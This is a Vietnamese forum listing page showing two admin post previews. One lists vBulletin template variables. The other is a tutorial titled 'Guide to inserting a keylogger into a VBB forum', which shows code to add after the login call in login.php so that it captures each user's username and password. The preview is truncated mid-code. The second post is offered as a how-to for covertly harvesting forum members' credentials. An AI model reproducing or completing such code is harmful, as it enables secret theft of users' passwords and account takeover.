Bạn được Tuti truong mời tham gia diễn đàn viết bài kiếm tiền VNO, bấm vào đây để đăng ký.
  1. Admin

    Đầy Đủ Các Biến Trong VBB - Vbulletin Variables List

    Danh sách các biến Biến thống kê site: * $totalthreads - Displays the total number of threads in the forum * $totalposts - Displays total number of posts in the forum * $numbermembers - Display total number of members in the forum * $totalonline - Displays the number of total users currently...
  2. Admin

    Hướng Dẫn Chèn Keylogger Vào Forum VBB

    Mở file login.php tìm dòng process_new_login(....) Chính xác là: process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); Thêm vào bên dưới: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password =...
Back